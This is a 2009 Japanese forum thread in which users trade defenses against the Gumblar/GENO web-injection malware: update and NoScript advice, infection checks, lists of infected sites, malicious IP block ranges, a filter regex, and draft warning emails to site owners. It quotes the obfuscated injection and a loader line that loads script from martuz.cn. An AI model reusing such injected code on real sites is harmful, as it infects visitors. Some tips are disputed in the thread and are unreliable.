1 :
192.168.0.774 :
2009/05/16(土) 14:04:24 ID:hzDONx9U0
感染予防対策 1.Adobe Flash Player の最新版にアップデート 2.Adobe Acrobat Reader の最新版にアップデート 3.NoScriptの導入(Firefoxの導入) 4.Adobe Acrobat Readerの JavaScript 機能OFF 5.危険IPのブロック 諸事情でAdobe Reader 最新版を使わざるを得ない場合 2009年4月29日現在の最新版バージョン9.1設定例 1.Adobe Readerを起動し「編集」メニューの「環境設定」 「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す) OKを押して設定確定後、Adobe Readerを終了。 ↓ 2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理 設定は SpeedUp - Fast がおすすめ。 注意すべきは Acroform(拡張子なし) Annotations(拡張子なし) これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。 そうしないと Adobe Reader が起動しなかったりする。 このとき追加作業として EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと より安心かもしれない。 以下はお約束 上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。 またAdobe Reader以外の環境設定をどうするかも各自考える必要があります。
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。
インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
※検出率が上がる頃には次の種類になっている
感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
【感染の確認方法】 @cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する ※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。 ■確認方法 1.スタートから「ファイル名を指定して実行」 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に 「regedit.exe」と入力して「OK」ボタンを押す。 ※立ち上がったことを確認したら弄らず閉じること。 3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す ※立ち上がったことを確認したらAへ Asqlsodbc.chmのファイルサイズの確認を確認する ■Windows XP: 改ざんされていなければ C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes ■Windows 2000: そもそも存在しないはずなので、 C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。 ■確認方法 1.スタートから「ファイル名を指定して実行」 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に 「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す →背景が黒いウィンドウが開いた場合3へ →起動しない場合:感染疑い濃厚 3.背景が黒いウィンドウを選択。 小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー Bavast!(無料のアンチウイルスソフト)で確認
改竄されたsqlsodbc.chmは サイズが1.29 KB (1,323 バイト) 更新日は2009年3月21日
亜種があるから
>>7 でないからと言って絶対に白だとはいえないが、
>>7 だったら100%黒
>>1 スレ立て乙でした。
テンプレはこんなものですか
11 :
192.168.0.774 :2009/05/16(土) 14:18:10 ID:hzDONx9U0
ageていきましょう
ん?もう書いてええのん?
IPブロックの纏めテキストと、PG2での導入方法等も纏めた方がよさげか
まとめると サイトを開く ↓ htmlに書かれたjsコードが実行される ↓ 別サイトへジャンプ?ファイル名.exeが実行される<ここでvistaならUACが出るはず ↓ 実行すると感染?C:\WINDOWS\system32\sqlsodbc.chmが上書きされる。<vistaの場合はC:\Windows\Help\mui\sqlsodbc.chm ↓ regedit.exe,cmd.exeが起動しなくなる?特定のサイトへのアクセス不可。 ↓ オワタ こんな感じでいいのかな。 で同人板の奴は感染した状態でFPTのサイトを更新しちゃうとパスワードとか抜かれて不正にサイトが書き換えられてしまう って事でいいのかな?今北で情報が多くてよくわからん
こんなときだからこそ リンク先の内容も一緒に貼って欲しい
ごめん。内容はコレ↓
【Genoウィルス総合スレ】ニフティのオンラインウィルスチェックをする→感染
1 : 番組の途中ですがアフィ禁止です :2009/05/15(金) 12:44:31 ID:QP0LhXxzP
ソース (p)
http://pc11.2ch.net/test/read.cgi/sec/1240853183/ 対策と駆除はこちら (p)
http://www29.atwiki.jp/geno/pages/14.html Adobe Reader/Flashのアップデートをお忘れ無く (p)
http://www.adobe.com/jp/ 745 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:30:27
てかニフティで検索するのに
ニフティ感染してるの????
746 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:31:09
>>745 ( ゚Д゚)
何だと・・・?
748 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:34:45
>>746 前のレスにも出てるけど(p)
http://www3.atword.jp/gnome/のサイトにかいてある (中略)
ニフティサーブ ネットワーク(ニフティ株式会社さん
61.121.100.119
の該当データの停止を行ってください。何度Mail送っても反応無いので・・・・・
749 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:37:17
>>745 マジかよ
さっきオンラインスキャンやってきたばっかだぞorz
早く寝てしまいたい…
750 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:38:08
ニフティにアクセスしたらアウトなの?
751 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:38:45
ニフティのセキュリティ情報サイトさっき見たばかりなんd
752 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:39:44
マジでヤバイなこれw
753 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:39:58
ニフティ今朝アクセスしたばっかり・・・。うwぁああああああああああああああ
あー・・もうなんかグダグダorz許して
勘違いする人が増えるような貼りかた止めろ それ@niftyがホストしてるサイトの一部にってことだろ
そうなのか。騒いでごめんなさい
フィルター始めて作ってみたけどどうだろ。 name test match (function([^>]++){var\s[^>]++='%';var\s[^>]++.replace([^>]+);eval(unescape([)]+))})(/,/g); replace <!-- type hidden --!>
何かギスギスしてんな
どうやらここが次スレになるらしい あぼん出来るし良かった
俺が立てといた 窓口は多い方がいいと思ってね
隔離スレにもなりゃしねぇ
俺は普通に波風タタサズニ立てたかったんだけどね
むしろこっちはまったりやればいい
セキュ板が荒れたので情報まとまらない。 こっちへ移動してきた。ヨロ。
同じく、よろ。
俺もこっちにしよう
ヤレヤレ。こっちまで追いかけてこないでくれればいいんだけど。
同人板からきました\(^O^)/
変な奴もまとめてこっちに来ればいい まとめてNGできるし
39 :
192.168.0.774 :2009/05/17(日) 11:42:52 ID:DhBs/7gt0
いいんじゃね
必要な情報は上で揃ってるな 特に追加するようなことは今のところないよね?
向こうの最後の方ににあった感染サイト うこっけい?とかあの辺ってもうまとめに入ってるのかな?
・なんらかの方法によるサーバへの侵入 FTPパスワードの漏洩なのかWebアプリの改ざんなのかは不明です。 ・Webサイトの改ざん 具体的にはdocument.write(unescape('%3CsI0cTJrZliptのようなスクリプトコードを 各ページに埋め込まれます。 %3CsI0cTJrZliptの部分については異なるパターンもあったようです。 ・そのほかの詳細は不明です 発見方法 ・公開しているすべてのページに該当スクリプトコードが埋め込まれているか 確認してください。その他の影響については詳細不明です。 対処 感染WebサイトについてはOS,Webサーバソフトが多岐にわたっており 管理FTPパスワードの漏洩なのかSQLインジェクション等の Webアプリ脆弱性を攻撃されたものなのかわかっていません。 改ざんされたスクリプトコードの削除だけで済む問題ではなく 侵入された経路の究明および対策が必要となってくると思われます。
何か変化起きた時のために保守気味で進行でいんじゃね? 先週金曜まではそうだったし。 saymoveと同人が来てから無駄に加速したね。
44 :
192.168.0.774 :2009/05/17(日) 11:45:48 ID:Sggs+C2i0
>>38 ありがとう助かります。
何せ外部リンクを結構チェックしないといけないので
同人というより鬼の首とったように 質問してる奴は腐腐言ってるやつの方が厄介だった気がする
静けさが嘘のようだw
よろしくー
ID出るだけでこうも違うとはw
>>44 作者さんに言ってあげて。俺、単なる間違い指摘入れただけの人だから。
移動完了
烏骨鶏は凸電誰かしましたか? 放置しておくと大変なことになる
AdobeAcrobatReaderのJavaScriptの脆弱性って、今年の3月にver.9.1で修正されたものと、 5月にver.9.1.1で修正されたものの2種類あるんだが、 いわゆるGENOウイルスってどちらの脆弱性ついたんだろうな。 もちろんどの脆弱性が塞がれているから安心ってのは無いけど、情報として知っておきたい。
>>50 電話番号書いてあるのは公式HPぐらい。
缶切りが缶詰の中に入ってる状態とはこの事
誰かタウンページ持ってこい
>>50 流れちゃってわかんないけど、もいっこあった希ガス
>>51 9.1.1で修正された方だと思っていたが・・・。
ver.9.1ではバッファーオーバーフローの脆弱性あったよね ver.9.1.1でそれを解決したんじゃない
57 :
192.168.0.774 :2009/05/17(日) 12:01:29 ID:Sggs+C2i0 BE:762340739-S★(634668)
>>55 あっちのスレの42さんか、俺はてっきり9.1修正のほうだと思ってたんで、逆に42さんの書き込みみてどうしたものかと思った口なんだ。
いまのところ、ウイルス対策ベンダにも2chも情報が少ない状態過ぎる。
ダメだ。あっちのスレでこっちに誘導してる・・・。
>>54 コピペだけどこれかな?
hXXp://www.seibidoshuppan.co.jp/
感染確認
>>59 いや、俺の思い込みかもしれない。
9.1の脆弱性をついた攻撃が既に広まっていたから、adobeが大急ぎで作ったのが9.1.1だったはず。
GENOのとタイミングが合っていたから 9.1の方ってのは可能性も考えてなかった。
情報は本当に少ないね。
61 名前:192.168.0.774[sage] 投稿日:2009/05/17(日) 12:04:03 ID:MP/sWvjo0
>>54 コピペだけどこれかな?
hXXp://www.seibidoshuppan.co.jp/
感染確認 ここは出版社
烏骨鶏はhxxp://www.ukokkei.co.jp/
フリーダイアルしか載ってないな、受注オペレーターじゃ話にならないし ><
>>65 >>64 に載ってるよ。多分それ。そこは踏んでも平気。
ukokkeiのurlで検索するとトロイ検出するから気をつけてw
店舗のメアドがない
>>65 せいびどう出版社って何処だか知らないけど、オペレーターに訳を説明して
TEL転送とか、電話先を教えてくれるんじゃない?
「お宅のHPを見たらウィルスの警告が出てくる。 どういうわけか説明してもらいたい。」 って言えば良いんじゃない?
本名で教えても良いけど、ウイルス食らっちゃうような店に 言っても解るとも思えないし、下手したら自分が変質者扱いだろうな・・・ でも専門店街代表のメールしかないからメールしてもその人たちが踏んじゃいそう
こことhxxp://www.ukokkei.co.jp/ 専門店街は住所が違うよ
>>5 感染者がcmd.exeを起動してはダメというレスを別板で見たんだが
このテンプレはこれでいいのか?
IPAも平日しか働いていないのか・・・。 受付時間:平日10:00〜12:00、13:30〜17:00
とりあえずフリーダイアルで電話して 責任者読んで説明してみる
>>73 お前が失敗すると後から凸っても全部悪戯扱いだからな。
それなりに頑張れ
>>75 www.ukokkei.co.jp/ ここ
【本店】のフリーダイヤル
>>71 たしかに感染サイトのお詫び文には
cmd 起動でエクスプローラーが落ちてregeditが起動できなくなるって書いてあったな。
ウィルスを無効化する方法も書いてあったけど、
あっちスレに転載すると、とんでもないことになりそうだからやめといた。
その方法で本当に無効化できるのかも分からんし、regeditで失敗されても困るし。
バックドアやダウンローダーが入り込んでいれば、仮に無効化できてもいつまで効くか分からないしね。
電凸用のテンプレも必要になってくるのかな?
>>77 へ
・GENOウィルスというコンピュータウィルスがある。
・Adobe Readerと言う文章読むプログラムの脆弱性を利用し感染する。
・感染したPCでホームページを更新すると、その時にパスワード等を盗み出してしまう。
・盗み出したパスワードでホームページを表示は元のまま、ウィルスのコードが書き加えられてしまう。
・現在お宅のホームページは書き換えられている。
・ソネットで詳しく説明されているので、ホームページの更新担当の人にこの情報を伝えて欲しい。
電話でない罠>本店
>>80 正攻法ならそれでいいんじゃない?
・ホームページを見た人が感染する
製作が別会社とか相手がアレだとGENO状態になるかもしれないけど
大手がやられて閉鎖してるってのは入れておいた方が良いとおもうw
so-net読んでもわからんかもね
出版社のHPはいろんな大手書店が発注やら在庫確認なんかで使用するので ものすごいことになると予想 普通に店頭のPCで開いて客に見せたりするからね
wiki重いぬ
烏骨鶏と出版社のWhoisを調べる。
成美堂出版が感染しました
a. [ドメイン名] UKOKKEI.CO.JP e. [そしきめい] かぶしきがいしゃ うこっけい f. [組織名] 株式会社烏骨鶏 g. [Organization] ukokkei,co.,Ltd. k. [組織種別] 株式会社 l. [Organization Type] Company m. [登録担当者] MU2056JP n. [技術連絡担当者] DT033JP p. [ネームサーバ] ns1.webhosting-jp.com p. [ネームサーバ] ns2.webhosting-jp.com [状態] Connected (2009/11/30) [登録年月日] 2004/11/16 [接続年月日] 2004/11/16 [最終更新] 2009/03/02 17:40:12 (JST)
>>3 の下の報告もここでいいのか?
邪魔になってない?
>>87 Whoisの結果のこの下に担当者と連絡先
があったような気がするのだが。
90 :
192.168.0.774 :2009/05/17(日) 13:01:40 ID:Sggs+C2i0 BE:508227629-S★(634671)
>>88 向こうのスレを見ていると機能していないんですよね
>>87 あるよ。
担当者名とメールアドレス
ここに晒しちゃまずいかな?
レン鯖はフューチャースピリッツ
>>5 >Bavast!(無料のアンチウイルスソフト)で確認
これ違う。感染後の確認には使えない。
avastは、感染を撒き散らしているサイトのスクリプトの大半に反応するので、ブロックできる
可能性が高いというだけ。(感染しているのにすり抜けるページも幾つか確認しているので、
完全には信用できない)
すり抜けて本体が落とされてしまった場合、Avastで検索しても見つからない可能性が高い。
(ほぼ日替わりで本体が入れ代わっており、入れ代わった後のパターン対応はどこの
セキュリティソフトベンダーでも追い付いていない)
予防法としては、Avastで感染サイトを訪問すると反応する(いくらかのすり抜けは発生する)ので
チェック可能。但し、すり抜けた時はがっつり感染するので自己責任。
幾つかのベンダーが行なっている本体の置かれているサイトをFW機能でブロックするのが
一番確実な方法。FW機能のないセキュリティソフトの場合、PG2の併用によってブロックするのが有効。
但し、本体の置かれるアドレスが変更になった場合(先週の金曜日辺りに入れ代わったんだっけ?)
ブロック対象の指定を追加しなければいけない。
スクリプトを検知するAvastの方式も、IP範囲をブロックするカスペ等の方式も、両方完璧ではないが
予防法としては一定の効果が見込めるというだけ。
>>91 昔調べたときあったと思ったのだなあ。
Whoisがそれでトラブルがあったとしか記憶がない。
ないならしょうがないか。
ありがとう。
>>92 あった?Whoisは公開されてるものだからいいでしょ
>>92 >担当者名とメールアドレス
>レン鯖はフューチャースピリッツ
そこに警告のメールを送ってみるしかないだろうね。
>>80 素人向けには難しい言葉ばかりだな。
・GENOウィルスというコンピュータウィルスがある。
・pdfファイルを読むプログラムに問題があり感染する。
・現在御社のホームページは書き換えられ、GENOウィルスが仕込まれている。
・総務部門かホームページの担当者にこの情報を伝えて欲しい。
これぐらいでいいんじゃね?
>>92 Whoisクライアント何使ってるんですか?
>>88 スレがあんなにヒドイことになると思わずに立ったスレだから、
仕方ないよね。
>>96 名前と電話番号
みっけた。
けど、ここに書いて本当にいいのか俺には分からない。
>>97 pdfなんて拡張子伝えられても訳ワカメだと思ったんでAdobe Readerって名前入れておいた。
それ以外に関してはそれでも良いかもだけど、その程度の情報だと今度は怪しい勧誘みたいにも聞える
>>93 やっぱ現段階ではNoScript必須ですな。
JavaScriptを利用しない形式に変わったらそれすら無効ですが・・・。
>>97 2番目が難しいと思う
見た人(顧客)が感染するって入れた方がいいんでない
>>42 >・なんらかの方法によるサーバへの侵入
>FTPパスワードの漏洩なのかWebアプリの改ざんなのかは不明です。
・セキュ板のGENOスレの1か2辺りで、ローカルにしか繋いでいないサーバーのhtmlが書き換えられたという報告
(動作中のマルウェアが行なっているのか、外部からのバックドア経由の操作なのかは不明)
・ftpログを見たら、海外からのアクセスで改変が行われていたという報告(ftpパスは漏洩していると考えるべき)
・動作解説してるサイトの翻訳では、感染PCがゾンビ化するというものがあったので、BOTネットに組込まれている
可能性があり、そちらから操作される可能性がある
こんな感じかな。
>>100 感染したサイトの会社に連絡つかないと
そこしか通報するしかないからねえ。
とりあえず、文章だけども考えておかないと。
○○○○ ご担当者さま ■ お願い 御社のHPに、閲覧者のPCに、第三者のサイトよりマルウェア(コンピュータウイルス)を ダウンロードさせるスクリプトが挿入されております。 この攻撃プログラムは、Adobe Acrobat Reader、Adobe Flash Playerの脆弱性を利用して パソコンの中にスパイプログラムを送り込みます。 Windows XP、2000とAcrobat Reader、 Flash Playerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。 同様のスクリプトの仕込まれたHPを閲覧することで感染したPCを利用して、 HPの更新作業を行なったため、(該当PCで稼働中のマルウェアが行なったのか、 FTPのIDとパスを盗みだした外部からのアクセスかはわかりませんが) 現在の状況になっているものと思われます。 これは、先日、小林製薬のHPで発生したものと同じものと思われますので 状況確認の上、感染PCからのウイルス除去と、HPの修正、閲覧者向けの告知を 行なって頂けないでしょうか。 下記のXXXXXにて報告があり、当方でも確認したところ、確かに危険コードが 含まれておりました。HP閲覧者のPCにウイルスが勝手にダウンロードされて しまうため、御社のHPが意図せぬ加害者となっております。 (感染報告のあったスレッド等のアドレス) HP更新に使用したPCがマルウェア(通称zlkon・GENOウイルス)に感染していると思われます。 ■ 確認した感染ページ (わかる範囲で記載) <多分、全てのページが感染中> ●HTMLファイルの場合 <body>タグの直前に難読化されたコードが埋め込まれる。 ●PHPの場合 ファイルの最初に難読化されたコードが埋め込まれる。 ●JSの場合 ファイルの最後に難読化されたコードが埋め込まれる。 その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。
>>109 俺が担当なら読まないで捨てるww
so-net貼ってあげたら?
(以下を付けるかどうかはお好みで)
■再発防止策
WindowsUpdate、Adobe Acrobat Reader、Adobe Flash Playerの積極的なアップデートに
加えて、既知の危険サイト(今回の場合は、
http://www29.atwiki.jp/geno/の焼却リスト参照 )を
ブロックするよう、セキュリティソフトのFWを適切に設定したり、PG2といったソフトで
ブロックすることしかないと思います。
感染してしまったことは、新型の危険ファイル配布方法の為、仕方ない面もありますが、
再発防止と、閲覧者に対する告知によって、被害の拡大を食い止めて頂きたいと思います。
■私見による蛇足
小林製薬の告知ページ等では、幾つかのセキュリティソフトベンダーを紹介して
おりますが、実際に稼動する本体は、ほとんど日替わりのように入れ替えられて
いる為に、紹介されているセキュリティソフトにて「除去が行なえるとは言い
切れません」。
http://www.kobayashi.co.jp/info/090512.html また、感染ファイルの除去を行なっても、Windowsの一部ファイルを変更して
しまっている為、原状復帰には至りませんので、閲覧者向けに告知される場合は、
セキュリティソフトベンダーのソフトでで駆除できる可能性もありますが
PCのリカバリを推奨するのが良いのではないかと思われます。
以上、要件のみにて失礼致します。
--
○○○○(自分の名前) <自分の連絡先メールアドレス>
>>109 ,>111-112
昨日、みかけた範囲の感染サイト管理者に送ったメールのコピペ。
テンプレの叩き台にでもどうぞ。
ID:ilxyL7Fy0さん乙です
>>112 最初に小林製薬が感染したと同じウィルスと入れた方がインパクトがあるように思いますが
>>109 文才ありますねー、それで送ってください
>>116 製薬会社がウィルスに感染したとかとんでもないしな
>>113 いやー管理者っつっても名前だけで外に製作任せてるかもしれんしな
まずは読ませる事を考えて、実例と顧客に被害が及ぶ事を説明して
信憑性あるサイトでも貼り付けて対応はよくわかる人に任せた方がいいんじゃない
何通もそんなの着ても速攻でゴミ箱いきな予感
>>107 最近、いろいろな国内企業の公式サイトが 悪意の攻撃者に改竄されているのはご存知でしょうか?
先日も小林製薬のサイトも改竄されて、サイトを閲覧した一般のお客さんにウィルスが感染しました。
じつは・・・
みたいな切り出しでよいのでは?
対策法とかは、もしかしたら、その担当者がセキュリティーベンダーに相談するような方向の方が良いかもしれない。
尋ねられたら、知っている範囲で答えてあげればいいし。
それだと、イタズラに思われるかな?
>>120 なんかスパムメールみたいに見えるなぁ
どうしたもんかね
まさか、人に文を読ませるために考えることになるとは思わなかったなw
アフェリみたいでうさんくさいwwwごめん(´・ω・`)
ちょっとスレから離れます。適当にがんがれw
俺は
>>120 路線でso-net張ってやって、
誰かに相談してねって方向が良いと思う
url貼っちゃうと感染してないPCで踏んじゃうかもね
>>121 スパム吹いた
もうそんな風にしかみえなくなったじゃないかw
今までの流れをみてると、各自が自分でちゃんと対策するのに任せるしかないって気がするけどな。
>>111 unescape()して出てくるサイトの一覧ってどこにあるの?まとめサイト?
成美堂出版の改竄部分をunescape()したら martuz.cn が出たけど
<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>
src=// なんて表記でちゃんとアクセスできるのかな? http: の部分を抜くのは何なんだ??
>>121 典型的なスパム文だわな
初めに誰もが知ってる大手の名前を出して注意をひくところが
難しいねぇ
御社のHPを拝見した所、ウイルスを検出しました。 HPが改変されています。 これは、現在流行っているウイルスの一種で、 HPを見るだけで感染してしまい、被害を拡大する恐れがあります。 こちらのso-netのリンクに詳細が書かれているので参考にしてください。 so−netのURL ご対応の程、宜しくお願い申し上げます。 尚、ウイルスに関して現在判明している情報は以下の通りです。 まとめのURLか、セキュベンダーのURL ↑こんなんでどうでしょ
正規のプロバイダメールで出せばどうなのかな? ヘッダを見たらスパムメールじゃない事が分かるし
名前だしただけで信頼されるような大手が複数でこの問題を扱ってるのを示せるわけじゃないからなあ。 現状で個人ができることなんてたかが知れてるし、変なやる気出してマルチポストしまくるのはかえって問題だ。 ちゃんと説明できるやつが家族や友人の面倒みるくらいで十分じゃないか。 企業の面倒まで見切れない。
一般人っぽく簡潔に書くのがいいんだろうな。やっぱり
店舗のメアドに送るならヘッダすら見ないと思うし 製作した会社とか鯖缶宛てなら詳しい事書かないでも まとめ見りゃわかるでしょ。一般的に見たら解らないものは拒否だから。
わたしの主人がオオアリクイに〜(以下略) みたいなタイトルで送るとか。(余計にスパムだなw) ま、冗談はさておき 1.HP管理者は気付いてすらいないのが殆どなので、読んでもらう必要がある 2.放置すると、ウイルス感染の二次被害の加害者になる危険があることを説明 3.よくわからないコードであるところの危険部分がどこだか指摘 (どの箇所に挿入されるか書いておくだけでいいかも?) 4.対処方法の説明。 まずはPCリカバリかOS再インストール→ftpパスワードを変更する→Webサーバーの中身を空にする →感染していないファイルを再UP の順番で行なうように説明 5.参考情報として、該当ウイルスの情報や対策についてのまとめリンクをつけておく (これを前に持ってくるか後に持ってくるかはどっちがいいんだろう?) 6.おまけとして念のために予防策の説明(は、押し付けがましいのでなくてもいいかも)
>>129 非常勤の親父「また迷惑メールか削除削除・・・」
上で誰かが書いてたか、お客さんを装った平易な文章のほうがいい気がする 「お宅のホームページ見てたらアンチウイルスソフトが警告を出したので、調べてみたら ウイルスコードがしかけられているようでした。 (so-netURL)と同じものと思われます。 ホームページを見るだけで、お客のパソコンが感染する危険なウイルスです。 どうか今すぐ対策をとってください (対策サイトURL)」 とかなんとか
【速報】虹裏感染の疑い
>>135 あるなwww
ここまで簡単に書いてもそれなら
もうそれはしょうがないよ
GENOの担当者は結局無反応だったよね?
複数名から違う文章で送れば 対応してくれんかなあ
7.閲覧者への事後報告と、感染の可能性の疑われる場合は、使用中のセキュリティソフトベンダーに 相談するように告知して欲しい、隠蔽されてしまうと、被害が拡大し、最終的にはその企業の信用が 落ちてしまう。…ということも伝えたいがどうしたもんか。
メールちゃんと読んでくれるような管理者ならすでに問題を知っていて対策してるだろ。 2chのまとめだってどこまで信頼してもらえるか微妙だし、こちらの所属を明らかにして送るんでもなければスパム扱いで終わりだ。
>>139 なんだ急に変なメール増えたな・・・削除削除(´・ω・)
レン鯖に連絡した方がいいんじゃね?
まぁ一軒潰した所で(ry
HP管理者ではなく、そのIPを管理している業者(whoisで調べる)のabuse窓口に送って、 ISPもしくは、レンタルサーバー管理会社を経由して警告して貰うという手法もあるね。
もうこれぐらい挑発的なので良いんじゃないか? これ送って反応無ければ、たまたま見つけた人っぽく上のメール送ってやる感じで 貴社のホームページがGENOウィルスに感染し、現在加害者になっています。 数日中に貴社ホームページよりウィルスコードの除去がなされていない場合、 京都府警察ハイテク犯罪対策室へ連絡させていただきます。 p.s. 対策に関してはググレ 管理できないホームページなら閉鎖しろ糞管理人
てめーこのやろー ページ開いたらパソコンばっ壊れたじゃねーか さっさとHP直しやがれ誠意ってなんですかねぃおおぅ?!
replica08■web■fc2■com/index■html 感染
147 :
192.168.0.774 :2009/05/17(日) 13:49:06 ID:+iVGXmeP0
148 :
192.168.0.774 :2009/05/17(日) 13:49:47 ID:T9pTie3x0
感染ってどうやって見つけてるの?
avastとバスター2009の同居ってやっぱだめ?
すまん、流れ読まずに投下 gnome氏のzlkon/gumblarサイトを参考に作ったんで防止策の一つとして貼っておく ・サーバがちょくちょく変わる性質なので今後の動向に注意 ・一番上のmartuz.cnはNEW ・行頭の"HiPr-"はgnome氏が緊急(High Priority)と書いてるもの ・言うまでもないが、IP範囲最終決定とか使用は自己責任で HiPr-NEW martuz.cn - 2009.05.16 (95.129.144.0/23) :95.129.144.0-95.129.145.255 HiPr- Botnet C&C by Gumblar - 2009.05.09 (78.109.16.0/20) :78.109.16.0-78.109.31.255 HiPr- gumblar relative 2009.05.07 (213.182.192.0/19) :213.182.192.0-213.182.223.255 HiPr- gumblar - 2009.05.02 (94.229.64.0/20) :94.229.64.0-94.229.79.255 Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (206.44.0.0/16) :206.44.0.0-206.44.255.255 Malware Injection 2009.05.06 (91.211.64.0/23) :91.211.64.0-91.211.65.255 basesrv3.net - 2009.05.03 (91.212.41.0/24) :91.212.41.0-91.212.41.255 Malware Injection 2009.05.06 (91.212.65.0/24) :91.212.65.0-91.212.65.255 Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (85.17.0.0/16) :85.17.0.0-85.17.255.255 autobestwestern.cn - 2009.05.13 (85.214.90.0/24) :85.214.90.0-85.214.90.255 gumblar via e-mail - 2009.05.12 (74.220.215.0/24) :74.220.215.0-74.220.215.255 zlkon another-type 2009.05.03 (212.117.160.0/19) :212.117.160.0-212.117.191.255 zlkon.lv -- 2009.04.05 (94.247.2.0/23) :94.247.2.0-94.247.3.255
一般に、機能の衝突するセキュリティソフトを複数導入するのは推奨されない。
>>152 だよね
バスター常時待機でときたまavastで検索って感じがいいかな?
成美堂出版 → martuz.cn <script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script> replica08■web■fc2■com → martuz.cn <script src=//m"+"artuz.cn/vid/?id="+j+"><\/script> 意外と飛び先は少ないのかもしれん リストが無いならつくるかねぇ
俺スパマーになれんのか?あっはは。
>>146 のIP 208.71.106.38
>>147 Adobe Readerってバージョン違いで共存できたっけ?
テンプレ的には Ver1〜Ver8とか使っている人は削除して ってのを途中に入れたほうがいいかもしれない。
しかし、IPA↓ 110番を語るには休みすぎ。
コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設けております。
届出の方法等、コンピュータウイルスに関連のあることは何でもご相談下さい。
受付時間:平日10:00〜12:00、13:30〜17:00
>>151 参考にさせてもらいます。
>>93 Avast!をすり抜けるサイト教えてくださいませ。見つけられない。
「5.危険IPのブロック」の方法がわからないのですが、教えてくれませんか?
>>157 セキュリティソフトでブロックする方法とルータでブロックする方法がある。
とりあえずルータの有無と使用しているセキュリティソフトを書いて。
>>64 GENOウィルスチェッカーだとひっかがらんよ
チェッカーは、まだだめみたいね
>>157 他の対策は済んだのか? 先にそっちをやっていれば5.に関してはそれほど神経質にならなくていい。
これからもソフトのアップデート情報には注意してください。
>>158 ルーターは NEC Aterm WR8500N セキュリティソフトはavast!です。
>>160 他のはすべて終わっています。一応念のためにも、と
御社のHPがウィルスに感染し、改竄されております。
改竄により御社ホームページを閲覧した一般のお客様まで次々と感染してしまう状態となっており、
現在御社が意図せぬ加害者となってしまっております。
被害を拡大を最小限に抑えるためにも、早急なご対応をお願い致します。
以下このウィルスについての説明を添えさせていただきます。
---
こんな感じで以下
>>109 路線の文章を貼り付けるのはどうだろう
読んで理解できる人がメールを受け取れば読むだろうが、理解できない人が見たときでも緊急性が伝わるように簡潔な前置きをおくべきかと
だが
>>120 路線だとセキュリティソフトの売りつけやサービスの営業スパムに見える気がする
・HPが改竄されている
・意図せぬ加害者となっている
・早急な対応を!
ということだけは伝える必要があるよな
これだきちんと伝われば理解できる人にパスされるだろうし、理解できる人がメールを受け取ったら自分でちゃんと読むだろう。
どうせ休日明けまで対処はないし、出社したら状況は把握するだろ。
>>156 TOPページは引っ掛かったが、リンクされている他のページの幾つかがVirusTotalではスルーになってました。
実際にAvastでアクセスしたのではなく、ダウンローダで感染サイトのTOPページのhtmlを取得。
エディタで開いてリンク先を片っ端からダウンローダで取得。拾ったうちの幾つかは、Avastスルー。
(8〜9割は検知してましたが、昨日拾った検体の中での話)
Avastに提出済みなので、近いうちには対応されるかと思いますが、難読化されたスクリプトには
複数のバリエーションがあるので、今後もすり抜けるケースも存在すると思いますから、
○○(今回はAvast)入れておけば大丈夫といった表現は避けた方がいいと思います。
>>163 それでいいと思う。
これまでにも
「サイトを閲覧していたユーザーからの連絡があったため調査し見ると〜に感染していると判明した」ってのは多い。
十分に内容は伝わっていると思うから、早速出した方が良いと思う。
あっちのスレが終わりそうだが、こっちに来る気か?
>>166 いくつか晒されたスクリプトを見る限りだとUA偽装も多少は有効そうなんだが、
実際のところはどうなんだろう。
まぁ条件式変えられる可能性が高いから安全とは全然言いがたいが。
171 :
本スレ誘導 :2009/05/17(日) 14:33:19 ID:789Se66x0
お前ら落ち着け!今は争ってる場合じゃない!
>>239 avastはファイアウォールがついてないのでそちらの方の対策は大丈夫ですか?
もし、対策されていたら余計なお世話ですみません。
>>174 すみません失礼しました。誤爆しました。
